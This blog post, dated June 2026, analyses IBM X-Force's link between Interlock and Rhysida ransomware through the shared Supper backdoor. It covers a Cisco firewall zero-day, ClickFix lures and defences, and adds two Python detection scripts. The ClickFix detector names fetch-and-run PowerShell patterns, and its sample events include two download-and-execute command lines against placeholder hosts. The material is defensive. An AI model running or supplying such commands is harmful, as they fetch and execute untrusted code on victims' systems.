Tuesday, June 16, 2026

One Backdoor, Two Ransomware Groups: The Supper Connection


What We Found
  • IBM X-Force linked both Interlock and Rhysida ransomware to the same Supper backdoor (also tracked as SocksShell and WINDYTWIST), first observed in July 2024 — pointing to shared developers or a common criminal service market rather than two fully independent groups.
  • By the end of 2025, each group had claimed roughly 80 victims; Rhysida's cumulative total reached 265 confirmed victims as of February 2026, with 133 of them (50.2%) located in the United States.
  • Interlock exploited CVE-2026-20131 — a CVSS 10.0 Cisco Secure Firewall Management Center zero-day enabling unauthenticated remote code execution with root privileges — 36 days before Cisco's official March 4, 2026 disclosure.
  • IBM X-Force identified "Slopoly" in early 2026, a PowerShell-based C2 framework (command-and-control infrastructure used to remotely direct compromised machines) bearing hallmarks of LLM generation — marking a new threshold in AI-assisted attack development.

The Evidence

16,384. That is the number of simultaneous attack sessions the Supper backdoor can sustain over a single TCP connection — a specification that reveals exactly how much operational scale this tool was engineered to support. When IBM X-Force researchers began pulling apart the malware code used by both Interlock and Rhysida ransomware operations, that figure was one of the telltale technical markers linking the two groups to a common codebase. As reported by CyberSecurityNews, the shared backdoor carries unique 16-bit session IDs and was first detected in the wild in July 2024 — months before Interlock even launched publicly in September 2024.

According to Google News's aggregation of threat intelligence reporting on this incident, the timeline itself is telling. Rhysida has operated as a Ransomware-as-a-Service (RaaS) platform since May 2023 — meaning the group licenses its ransomware infrastructure to affiliated criminal operators in exchange for a share of ransom proceeds. Interlock arrived roughly 15 months later with capabilities that looked suspiciously familiar. Cisco Talos assessed with low confidence that "Interlock ransomware is likely a new diversified group that emerged from Rhysida ransomware operators or developers, based on some similarities in the operators' tactics, techniques, and procedures (TTPs) and in the ransomware encryptor binaries." IBM X-Force offered a more calibrated read: "The overlaps are strong enough to suggest either shared developers, shared code lineage, or a tightly connected criminal service market, but not enough to prove a single unified group."

The shared tooling extends beyond the Supper backdoor itself. CyberSecurityNews's review of IBM X-Force's code analysis found that NodeSnake, the JunkFiction downloader, InterlockRAT, and multiple Supper variants all appear to have grown from the same original codebase. The connection widened further in November 2025, when Gootloader malware campaigns were observed dropping the Supper SOCKS5 backdoor — indicating adoption well beyond Interlock and Rhysida. The emerging picture is less "two rival criminal gangs" and more a functioning criminal supply chain with shared service vendors.

What It Means — and Who Carries the Blast Radius

Shared tooling creates a specific problem for defenders: attribution confusion. When two groups run the same backdoor, incident responders burn precious containment hours trying to identify which threat actor they face rather than isolating the breach. That delay is measurable in data exfiltrated, patients notified, and regulators called.

As of June 16, 2026, the blast radius is already documented and specific. Amazon's threat intelligence teams identified an active Interlock campaign exploiting CVE-2026-20131 in March 2026, targeting education, engineering, manufacturing, healthcare, and government. The vulnerability — a critical flaw in Cisco Secure Firewall Management Center that allows an unauthenticated remote attacker to execute arbitrary commands with root privileges — carries a CVSS severity score of 10.0, the maximum possible. Interlock began exploiting it on January 26, 2026, 36 days before Cisco's official disclosure on March 4, 2026. Federal agencies received a mandatory patch deadline of March 22, 2026 — just 18 days post-disclosure.

Confirmed Ransomware Victim Counts (as of Feb 2026)

  Rhysida, total (Feb 2026)              265
  Rhysida, United States (Feb 2026)      133
  Interlock, total claimed (end-2025)    ~80

Chart: Confirmed victim counts for Rhysida (total and U.S.-only as of February 2026) versus Interlock's claimed count through end of 2025. Sources: IBM X-Force, CISA Advisory AA25-203A.

The DaVita breach from April 2025 provides the clearest data point for what blast radius looks like in a healthcare setting: Interlock exfiltrated 1.5 terabytes of data affecting more than 200,000 patients. Rhysida posted victims on a near-daily basis in late December 2025, with 8 distinct major attacks recorded between January 6 and February 17, 2026 alone. On July 22, 2025, CISA, the FBI, HHS, and MS-ISAC issued joint advisory AA25-203A documenting Interlock's TTPs and indicators of compromise (IOCs — unique digital fingerprints that malware leaves behind) from investigations as recent as June 2025. For organizations in healthcare and government that have not reviewed it, that advisory is the first document to pull.

The Criminal Supply Chain the Headline Buries

My read on the IBM X-Force analysis: this story is less about two ransomware brands competing and more about how the ransomware ecosystem has industrialized. Groups no longer need to build every tool from scratch. A shared backend — private crypter services, initial access brokers, common backdoors like Supper — lets new affiliates stand up sophisticated operations rapidly while simultaneously obscuring attribution. The criminal service market does what legitimate SaaS does: abstracts complexity so operators can focus on deployment.

The ClickFix social engineering tactic used by Interlock as its primary initial access method illustrates this maturity clearly. Threat actors serve fake system alerts and counterfeit CAPTCHA pages to trick end users into opening PowerShell and executing malicious commands manually. No zero-day required for initial entry — just a convincing fake browser error. This technique bypasses traditional endpoint detection because the user, not automated malware, initiates execution. Security awareness training on this single pattern can close the door on Interlock's most common entry vector.

And then there is Slopoly. IBM X-Force identified this PowerShell-based command-and-control framework in early 2026 as likely LLM-generated — evidenced by unusually extensive inline code commentary, structured logging, clearly named variables, and sophisticated error-handling logic that human-written malware rarely bothers to include. Interlock's ability to deploy AI-generated malware that maintained persistent access to compromised servers for more than a week signals that the technical barrier to building functional, well-documented attack tooling has dropped to "know how to write a prompt." This connects to the broader pattern Smart AI Agents covered recently on AI governance: as large language model capabilities become commoditized infrastructure, so does their use by threat actors to accelerate attack development cycles.

How to Act on This — Ship This Control Today

1. Patch CVE-2026-20131 — No Exceptions, No Delay

If your organization runs Cisco Secure Firewall Management Center and has not applied the patch disclosed on March 4, 2026, there is an unauthenticated remote code execution hole with a CVSS 10.0 score sitting at your network perimeter. Federal agencies were required to remediate by March 22, 2026. If your organization has already let that government-mandated deadline pass, ship this update to production today. Verify patch status across every Cisco FMC instance — especially any that are not directly internet-facing but reachable through internal pivot paths. Interlock demonstrated it was exploiting this vulnerability 36 days before disclosure, meaning patch lag is the attacker's advantage.

2. Block ClickFix Before It Reaches the Keyboard

Interlock's most documented initial access method requires no sophisticated exploit — only a user who trusts a fake error message. Deploy DNS-layer filtering or browser isolation (tools such as Cisco Umbrella, Cloudflare Gateway, or comparable platforms) to block domains serving ClickFix lure pages. Complement this with a targeted security awareness session covering one specific pattern: no legitimate software or website will ever instruct a user to open a terminal, copy a command, and run it manually. One focused training session on this single technique — not a thirty-item cybersecurity best practices checklist — addresses the root of Interlock's most common entry point.
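The ClickFix pattern described in the section above and in this step has one telemetry signature that filtering and training do not cover: the user pastes the command, so the shell's parent is the desktop shell rather than a dropper. The following is an added example, not code from the article's author, IBM X-Force or any vendor; the event field names (parent_image, image, command_line, user) are an assumed normalized schema, the process events are constructed, and the command-line patterns are illustrative choices that need tuning against local admin habits.

```python
"""Flag ClickFix-style user-launched shells in process-creation telemetry.

Added example for this article, not code from the article's author or any
vendor. Event field names (parent_image, image, command_line, user) are an
assumed normalised schema; the events below are constructed. The logic follows
the article's point that the user, not malware, starts execution: a shell whose
parent is the desktop shell (Run box or pasted command) and whose command line
carries download-and-execute or window-hiding options.
"""
from __future__ import annotations

import re

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
USER_LAUNCHERS = {"explorer.exe"}   # assumed parent of a Win+R / Run-box launch
# Command-line fragments typical of a pasted fetch-and-run one-liner.
SUSPECT_PATTERNS = [
    re.compile(r"-(?:e|enc|encodedcommand)\b", re.I),
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    re.compile(r"downloadstring|invoke-webrequest|\birm\b|\biwr\b|curl\s", re.I),
]


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the matched indicators; an empty list means not suspicious."""
    if basename(event.get("image", "")) not in SHELLS:
        return []
    if basename(event.get("parent_image", "")) not in USER_LAUNCHERS:
        return []   # scripts started from cmd, schedulers or deployment tools
                    # are out of scope here; the aim is the user-pasted launch
    cmd = event.get("command_line", "")
    return [p.pattern for p in SUSPECT_PATTERNS if p.search(cmd)]


def hunt(events) -> list[dict]:
    """One finding per event that classify() marks as suspicious."""
    findings = []
    for ev in events:
        hits = classify(ev)
        if hits:
            findings.append({"user": ev.get("user"), "image": basename(ev["image"]),
                             "indicators": hits})
    return findings


# Constructed events (not real telemetry). Event 2 is a user simply opening a
# console, which must not alert; event 3 has a non-user parent and is ignored.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr http://captcha-check.invalid/v.txt)"',
     "user": r"CORP\jdoe"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe", "user": r"CORP\jdoe"},
    {"parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -File deploy.ps1", "user": r"CORP\svc_deploy"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c curl http://verify-human.invalid/x -o x.exe && x.exe",
     "user": r"CORP\asmith"},
]


def run_sample() -> list[dict]:
    return hunt(SAMPLE_EVENTS)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The parent-process scope is the deliberate design choice: a console the user merely opens produces no finding, while the same console launched from the desktop shell with a fetch-and-run command line does, which is exactly the step the awareness session above tells users never to perform.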

3. Hunt for Supper IOCs Using Advisory AA25-203A

Load the indicators of compromise from CISA advisory AA25-203A directly into your SIEM (Security Information and Event Management platform — the system that aggregates logs and generates alerts across your environment) and EDR (Endpoint Detection and Response) tooling. Hunt specifically for Supper's behavioral signature: a single persistent TCP connection carrying an unusually high volume of multiplexed sessions, particularly over non-standard ports. Standard detection rules watching for many simultaneous connections will miss it — the tool is engineered to look like one connection. Organizations in healthcare, education, and government should treat this as a priority threat hunt given both groups' documented and consistent targeting of those sectors. This is an incident response discipline that pays dividends regardless of whether Interlock or Rhysida is the active threat.

Frequently Asked Questions

How does the Supper backdoor work, and why is it difficult to detect on corporate networks?

Supper operates as a SOCKS5 proxy — essentially an encrypted tunnel that routes attacker traffic through a compromised internal machine, making malicious communications appear to originate from inside the network. Its key technical characteristic is multiplexing: it supports up to 16,384 concurrent sessions over a single TCP connection, using unique 16-bit session IDs to track each one. Detection approaches that look for many simultaneous outbound connections will miss it entirely, because from the network's perspective it registers as a single persistent session. Effective detection requires behavioral rules targeting the data volume and pattern flowing through a single long-lived TCP connection on non-standard ports — a detection capability that requires tuning SIEM rules beyond default configurations.
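Step 3 above and this answer both describe the same hunt: match the AA25-203A indicators, and separately look for one long-lived, high-volume TCP connection on a non-standard port rather than for many connections. The following is an added example, not code from IBM X-Force, CISA or the article's author; it assumes connection records in a Zeek conn.log-like tab-separated layout, the flow records are constructed, the thresholds are illustrative assumptions, and the IOC values are placeholders in RFC 5737 documentation ranges standing in for the advisory's real list.

```python
"""Hunt for Supper-style multiplexed tunnels in connection logs.

Added example for this article, not code from IBM X-Force, CISA or the author.
Assumes a Zeek conn.log-like tab-separated layout with a header row and "-" for
unset fields; thresholds and IOC values are placeholders (real indicators come
from CISA advisory AA25-203A).
"""
from __future__ import annotations

from dataclasses import dataclass

MIN_DURATION_S = 6 * 3600           # assumed: one connection alive 6 h or more
MIN_TOTAL_BYTES = 20 * 1024 * 1024  # assumed: 20 MiB carried by that connection
MIN_BALANCE = 0.2                   # proxied sessions are two-way; backups and
                                    # downloads are almost entirely one-way
STANDARD_PORTS = {22, 25, 53, 80, 443, 465, 587, 993, 995, 3389}
# Placeholder IOCs (RFC 5737 ranges); replace with the AA25-203A list.
IOC_HOSTS = {"198.51.100.23", "203.0.113.77"}


@dataclass
class Flow:
    orig_h: str
    resp_h: str
    resp_p: int
    proto: str
    duration: float
    orig_bytes: int
    resp_bytes: int


def balance(f: Flow) -> float:
    """Smaller direction over larger direction; 1.0 is fully symmetric."""
    hi = max(f.orig_bytes, f.resp_bytes)
    return min(f.orig_bytes, f.resp_bytes) / hi if hi else 0.0


def parse_conn_log(lines) -> list[Flow]:
    """Parse a header-led, tab-separated conn.log subset; '-' reads as zero."""
    num = lambda v, cast: cast(v) if v != "-" else cast(0)
    flows, header = [], None
    for raw in lines:
        line = raw.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if header is None:          # first data line names the columns
            header = fields
            continue
        rec = dict(zip(header, fields))
        flows.append(Flow(rec["id.orig_h"], rec["id.resp_h"], int(rec["id.resp_p"]),
                          rec["proto"], num(rec["duration"], float),
                          num(rec["orig_bytes"], int), num(rec["resp_bytes"], int)))
    return flows


def hunt(flows) -> list[dict]:
    """One finding per flow that hits an IOC or fits the single-tunnel profile."""
    findings = []
    for f in flows:
        reasons = []
        total = f.orig_bytes + f.resp_bytes
        if f.resp_h in IOC_HOSTS:
            reasons.append("destination matches IOC list")
        if f.proto == "tcp" and f.duration >= MIN_DURATION_S and total >= MIN_TOTAL_BYTES:
            # A multiplexed tunnel is ONE heavy, persistent connection, so
            # connection-count rules never fire; qualify the volume signal with
            # port and direction so routine bulk transfers drop out.
            signals = []
            if f.resp_p not in STANDARD_PORTS:
                signals.append(f"non-standard port {f.resp_p}")
            if balance(f) >= MIN_BALANCE:
                signals.append(f"two-way traffic (balance {balance(f):.2f})")
            if signals:
                reasons.append(f"long-lived TCP flow, {f.duration / 3600:.1f} h, "
                               f"{total >> 20} MiB: " + "; ".join(signals))
        if reasons:
            findings.append({"orig_h": f.orig_h, "resp_h": f.resp_h,
                             "resp_p": f.resp_p, "reasons": reasons})
    return findings


# Constructed sample records, not real telemetry. Row 4 is a one-way backup
# job on 443 that the balance check is meant to leave alone.
SAMPLE_CONN_LOG = """\
id.orig_h\tid.resp_h\tid.resp_p\tproto\tduration\torig_bytes\tresp_bytes
10.0.5.21\t198.51.100.23\t8443\ttcp\t31200.5\t412000000\t398000000
10.0.5.22\t203.0.113.77\t443\ttcp\t2.1\t1400\t5200
10.0.7.9\t192.0.2.44\t4444\ttcp\t43000.0\t90000000\t76000000
10.0.7.10\t192.0.2.9\t443\ttcp\t36000.0\t120000000\t2000000
10.0.3.3\t192.0.2.15\t80\ttcp\t0.9\t800\t64000
"""


def run_sample() -> list[dict]:
    return hunt(parse_conn_log(SAMPLE_CONN_LOG.splitlines()))


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

The two checks are kept independent on purpose: the IOC match catches known infrastructure even on a short, ordinary-looking HTTPS flow, while the profile check catches an unknown endpoint by the shape of the connection alone. The direction-balance test is what separates a proxied tunnel from a long backup or large download, which are the usual false positives for any "one big connection" rule.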

Is Interlock ransomware directly related to Rhysida, or are they independent threat actors sharing tools?

The relationship is documented but contested in its precise nature. Cisco Talos assessed with low confidence that Interlock likely emerged from Rhysida operators or developers, citing overlapping TTPs and similarities in encryptor binaries. IBM X-Force's code-level analysis stopped short of declaring them a unified group, characterizing the overlaps as consistent with shared developers, shared code lineage, or a tightly connected criminal service marketplace. What both assessments agree on: IOCs associated with one group should be treated as actionable indicators for the other. The November 2025 observation of Gootloader campaigns also dropping the Supper backdoor suggests the shared tooling extends beyond just these two groups, pointing to a broader criminal supply chain rather than an exclusive bilateral relationship.

What industries does Interlock ransomware target most, and what does an effective data protection response look like?

As of June 16, 2026, Interlock's confirmed target sectors include healthcare, education, engineering, manufacturing, and government — all characterized by high data sensitivity, regulatory exposure, and historically slower patch deployment cycles. The April 2025 DaVita breach (1.5 terabytes exfiltrated, 200,000-plus patients affected) sets the stakes for healthcare organizations specifically. An effective data protection posture against Interlock requires layering: apply CVE-2026-20131 patches immediately, review all internet-facing firewall management interfaces, deploy ClickFix-specific user awareness training, load AA25-203A IOCs into detection tooling, and confirm that network segmentation prevents a compromised endpoint from reaching backup infrastructure directly. Organizations subject to HIPAA should also review their incident response plans on the assumption that Interlock's default playbook is double-extortion — encrypt the data and threaten to publish it — which means backups alone do not eliminate leverage.

Disclaimer: This article is editorial commentary for informational purposes only and does not constitute professional security consulting advice. Threat data and statistics reflect publicly available information at time of writing. Always consult with a qualified cybersecurity professional for your organization's specific needs. Research based on publicly available sources current as of June 16, 2026.
